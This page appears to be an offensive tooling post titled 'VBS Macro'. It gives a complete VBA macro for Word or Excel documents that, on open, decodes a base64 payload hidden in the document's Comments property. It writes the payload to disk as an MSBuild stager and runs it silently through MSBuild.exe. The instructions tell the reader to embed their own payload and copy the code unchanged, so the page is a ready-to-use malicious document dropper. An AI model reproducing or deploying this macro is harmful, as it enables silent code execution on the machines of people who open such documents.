<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>VBS Macro</title>
</head><body>Use this as a macro inside a word doc, excel doc, or whatever you can think of, the example below uses msbuild. &nbsp;Also, you have to base64 encode your payload and paste the payload into the "Comments" properties of your document.<br/>
<br/>
######################################################################################<br/>
Do not edit below this line, copy, paste, and make your own file.<br/>
#######################################################################################<br/>
<br/>
Option Explicit<br/>
<br/>
Private InitDone &nbsp; &nbsp; &nbsp; As Boolean<br/>
Private Map1(0 To 63) &nbsp;As Byte<br/>
Private Map2(0 To 127) As Byte<br/>
<br/>
<br/>
Public Function Base64EncodeString(ByVal s As String) As String<br/>
&nbsp; &nbsp;Base64EncodeString = Base64Encode(ConvertStringToBytes(s))<br/>
&nbsp; &nbsp;End Function<br/>
<br/>
<br/>
Public Function Base64Encode(InData() As Byte)<br/>
&nbsp; &nbsp;Base64Encode = Base64Encode2(InData, UBound(InData) - LBound(InData) + 1)<br/>
&nbsp; &nbsp;End Function<br/>
<br/>
<br/>
Public Function Base64Encode2(InData() As Byte, ByVal InLen As Long) As String<br/>
&nbsp; &nbsp;If Not InitDone Then Init<br/>
&nbsp; &nbsp;If InLen = 0 Then Base64Encode2 = "": Exit Function<br/>
&nbsp; &nbsp;Dim ODataLen As Long: ODataLen = (InLen * 4 + 2) \ 3 &nbsp; &nbsp; ' output length without padding<br/>
&nbsp; &nbsp;Dim OLen As Long: OLen = ((InLen + 2) \ 3) * 4 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; ' output length including padding<br/>
&nbsp; &nbsp;Dim Out() As Byte<br/>
&nbsp; &nbsp;ReDim Out(0 To OLen - 1) As Byte<br/>
&nbsp; &nbsp;Dim ip0 As Long: ip0 = LBound(InData)<br/>
&nbsp; &nbsp;Dim ip As Long<br/>
&nbsp; &nbsp;Dim op As Long<br/>
&nbsp; &nbsp;Do While ip &lt; InLen<br/>
&nbsp; &nbsp; &nbsp; Dim i0 As Byte: i0 = InData(ip0 + ip): ip = ip + 1<br/>
&nbsp; &nbsp; &nbsp; Dim i1 As Byte: If ip &lt; InLen Then i1 = InData(ip0 + ip): ip = ip + 1 Else i1 = 0<br/>
&nbsp; &nbsp; &nbsp; Dim i2 As Byte: If ip &lt; InLen Then i2 = InData(ip0 + ip): ip = ip + 1 Else i2 = 0<br/>
&nbsp; &nbsp; &nbsp; Dim o0 As Byte: o0 = i0 \ 4<br/>
&nbsp; &nbsp; &nbsp; Dim o1 As Byte: o1 = ((i0 And 3) * &amp;H10) Or (i1 \ &amp;H10)<br/>
&nbsp; &nbsp; &nbsp; Dim o2 As Byte: o2 = ((i1 And &amp;HF) * 4) Or (i2 \ &amp;H40)<br/>
&nbsp; &nbsp; &nbsp; Dim o3 As Byte: o3 = i2 And &amp;H3F<br/>
&nbsp; &nbsp; &nbsp; Out(op) = Map1(o0): op = op + 1<br/>
&nbsp; &nbsp; &nbsp; Out(op) = Map1(o1): op = op + 1<br/>
&nbsp; &nbsp; &nbsp; Out(op) = IIf(op &lt; ODataLen, Map1(o2), Asc("=")): op = op + 1<br/>
&nbsp; &nbsp; &nbsp; Out(op) = IIf(op &lt; ODataLen, Map1(o3), Asc("=")): op = op + 1<br/>
&nbsp; &nbsp; &nbsp; Loop<br/>
&nbsp; &nbsp;Base64Encode2 = ConvertBytesToString(Out)<br/>
&nbsp; &nbsp;End Function<br/>
<br/>
<br/>
Public Function Base64DecodeString(ByVal s As String) As String<br/>
&nbsp; &nbsp;If s = "" Then Base64DecodeString = "": Exit Function<br/>
&nbsp; &nbsp;Base64DecodeString = ConvertBytesToString(Base64Decode(s))<br/>
&nbsp; &nbsp;End Function<br/>
<br/>
<br/>
Public Function Base64Decode(ByVal s As String) As Byte()<br/>
&nbsp; &nbsp;If Not InitDone Then Init<br/>
&nbsp; &nbsp;Dim IBuf() As Byte: IBuf = ConvertStringToBytes(s)<br/>
&nbsp; &nbsp;Dim ILen As Long: ILen = UBound(IBuf) + 1<br/>
&nbsp; &nbsp;If ILen Mod 4 &lt;&gt; 0 Then Err.Raise vbObjectError, , "Length of Base64 encoded input string is not a multiple of 4."<br/>
&nbsp; &nbsp;Do While ILen &gt; 0<br/>
&nbsp; &nbsp; &nbsp; If IBuf(ILen - 1) &lt;&gt; Asc("=") Then Exit Do<br/>
&nbsp; &nbsp; &nbsp; ILen = ILen - 1<br/>
&nbsp; &nbsp; &nbsp; Loop<br/>
&nbsp; &nbsp;Dim OLen As Long: OLen = (ILen * 3) \ 4<br/>
&nbsp; &nbsp;Dim Out() As Byte<br/>
&nbsp; &nbsp;ReDim Out(0 To OLen - 1) As Byte<br/>
&nbsp; &nbsp;Dim ip As Long<br/>
&nbsp; &nbsp;Dim op As Long<br/>
&nbsp; &nbsp;Do While ip &lt; ILen<br/>
&nbsp; &nbsp; &nbsp; Dim i0 As Byte: i0 = IBuf(ip): ip = ip + 1<br/>
&nbsp; &nbsp; &nbsp; Dim i1 As Byte: i1 = IBuf(ip): ip = ip + 1<br/>
&nbsp; &nbsp; &nbsp; Dim i2 As Byte: If ip &lt; ILen Then i2 = IBuf(ip): ip = ip + 1 Else i2 = Asc("A")<br/>
&nbsp; &nbsp; &nbsp; Dim i3 As Byte: If ip &lt; ILen Then i3 = IBuf(ip): ip = ip + 1 Else i3 = Asc("A")<br/>
&nbsp; &nbsp; &nbsp; If i0 &gt; 127 Or i1 &gt; 127 Or i2 &gt; 127 Or i3 &gt; 127 Then _<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;Err.Raise vbObjectError, , "Illegal character in Base64 encoded data."<br/>
&nbsp; &nbsp; &nbsp; Dim b0 As Byte: b0 = Map2(i0)<br/>
&nbsp; &nbsp; &nbsp; Dim b1 As Byte: b1 = Map2(i1)<br/>
&nbsp; &nbsp; &nbsp; Dim b2 As Byte: b2 = Map2(i2)<br/>
&nbsp; &nbsp; &nbsp; Dim b3 As Byte: b3 = Map2(i3)<br/>
&nbsp; &nbsp; &nbsp; If b0 &gt; 63 Or b1 &gt; 63 Or b2 &gt; 63 Or b3 &gt; 63 Then _<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;Err.Raise vbObjectError, , "Illegal character in Base64 encoded data."<br/>
&nbsp; &nbsp; &nbsp; Dim o0 As Byte: o0 = (b0 * 4) Or (b1 \ &amp;H10)<br/>
&nbsp; &nbsp; &nbsp; Dim o1 As Byte: o1 = ((b1 And &amp;HF) * &amp;H10) Or (b2 \ 4)<br/>
&nbsp; &nbsp; &nbsp; Dim o2 As Byte: o2 = ((b2 And 3) * &amp;H40) Or b3<br/>
&nbsp; &nbsp; &nbsp; Out(op) = o0: op = op + 1<br/>
&nbsp; &nbsp; &nbsp; If op &lt; OLen Then Out(op) = o1: op = op + 1<br/>
&nbsp; &nbsp; &nbsp; If op &lt; OLen Then Out(op) = o2: op = op + 1<br/>
&nbsp; &nbsp; &nbsp; Loop<br/>
&nbsp; &nbsp;Base64Decode = Out<br/>
&nbsp; &nbsp;End Function<br/>
<br/>
Private Sub Init()<br/>
&nbsp; &nbsp;Dim c As Integer, i As Integer<br/>
&nbsp; &nbsp;<br/>
&nbsp; &nbsp;i = 0<br/>
&nbsp; &nbsp;For c = Asc("A") To Asc("Z"): Map1(i) = c: i = i + 1: Next<br/>
&nbsp; &nbsp;For c = Asc("a") To Asc("z"): Map1(i) = c: i = i + 1: Next<br/>
&nbsp; &nbsp;For c = Asc("0") To Asc("9"): Map1(i) = c: i = i + 1: Next<br/>
&nbsp; &nbsp;Map1(i) = Asc("+"): i = i + 1<br/>
&nbsp; &nbsp;Map1(i) = Asc("/"): i = i + 1<br/>
&nbsp; &nbsp;<br/>
&nbsp; &nbsp;For i = 0 To 127: Map2(i) = 255: Next<br/>
&nbsp; &nbsp;For i = 0 To 63: Map2(Map1(i)) = i: Next<br/>
&nbsp; &nbsp;InitDone = True<br/>
&nbsp; &nbsp;End Sub<br/>
<br/>
Private Function ConvertStringToBytes(ByVal s As String) As Byte()<br/>
&nbsp; &nbsp;Dim b1() As Byte: b1 = s<br/>
&nbsp; &nbsp;Dim l As Long: l = (UBound(b1) + 1) \ 2<br/>
&nbsp; &nbsp;If l = 0 Then ConvertStringToBytes = b1: Exit Function<br/>
&nbsp; &nbsp;Dim b2() As Byte<br/>
&nbsp; &nbsp;ReDim b2(0 To l - 1) As Byte<br/>
&nbsp; &nbsp;Dim p As Long<br/>
&nbsp; &nbsp;For p = 0 To l - 1<br/>
&nbsp; &nbsp; &nbsp; Dim c As Long: c = b1(2 * p) + 256 * CLng(b1(2 * p + 1))<br/>
&nbsp; &nbsp; &nbsp; If c &gt;= 256 Then c = Asc("?")<br/>
&nbsp; &nbsp; &nbsp; b2(p) = c<br/>
&nbsp; &nbsp; &nbsp; Next<br/>
&nbsp; &nbsp;ConvertStringToBytes = b2<br/>
&nbsp; &nbsp;End Function<br/>
<br/>
Private Function ConvertBytesToString(b() As Byte) As String<br/>
&nbsp; &nbsp;Dim l As Long: l = UBound(b) - LBound(b) + 1<br/>
&nbsp; &nbsp;Dim b2() As Byte<br/>
&nbsp; &nbsp;ReDim b2(0 To (2 * l) - 1) As Byte<br/>
&nbsp; &nbsp;Dim p0 As Long: p0 = LBound(b)<br/>
&nbsp; &nbsp;Dim p As Long<br/>
&nbsp; &nbsp;For p = 0 To l - 1: b2(2 * p) = b(p0 + p): Next<br/>
&nbsp; &nbsp;Dim s As String: s = b2<br/>
&nbsp; &nbsp;ConvertBytesToString = s<br/>
&nbsp; &nbsp;End Function<br/>
<br/>
<br/>
Sub auto_open()<br/>
Dim oWB As Workbook<br/>
Set oWB = ActiveWorkbook<br/>
Dim msbuild_stager As String<br/>
<br/>
msbuild_stager = oWB.BuiltinDocumentProperties("Comments")<br/>
<br/>
Dim strPath1 As String<br/>
strPath1 = Environ$("Public") &amp; "\Libraries\msbuild_stager.xml"<br/>
Dim fso1 As Object<br/>
Set fso1 = CreateObject("Scripting.FileSystemObject")<br/>
Dim oFile1 As Object<br/>
Set oFile1 = fso1.CreateTextFile(strPath1)<br/>
oFile1.WriteLine Base64DecodeString(msbuild_stager)<br/>
oFile1.Close<br/>
Set fso1 = Nothing<br/>
Set oFile1 = Nothing<br/>
<br/>
<br/>
Shell ("cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" &amp; " " &amp; Environ$("PUBLIC") &amp; "\Libraries\msbuild_stager.xml"), vbHide<br/>
<br/>
End Sub<br/>
<br/>
<br/>
</body></html>